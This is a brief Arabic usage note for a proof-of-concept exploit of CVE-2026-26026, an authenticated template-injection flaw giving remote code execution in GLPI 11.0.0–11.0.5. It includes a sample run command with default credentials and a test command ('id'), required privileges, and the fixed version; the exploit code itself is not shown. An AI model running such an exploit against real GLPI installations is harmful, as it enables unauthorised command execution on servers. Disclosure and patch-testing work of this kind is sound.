
سكربت PoC لـ CVE-2026-26026 إصدارات GLPI من 11.0.0 إلى 11.0.5
استغلال SSTI مُصادَق عليه ← RCE لـ CVE-2026-26026 (GLPI 11.0.0–11.0.5).
الشرح الكامل: https://www.bzhunt.fr/blog/cve_glpi/
python3 POC_GLPI_Form_Dropdown_SSTI.py https://target.com \
-u glpi -p 'glpi' --cmd 'id'
يتطلب حسابًا يمتلك صلاحية form CREATE (super-admin). يجب أن يكون الهدف GLPI ≤ 11.0.5 (تم إصلاحه في 11.0.6).
pip install requests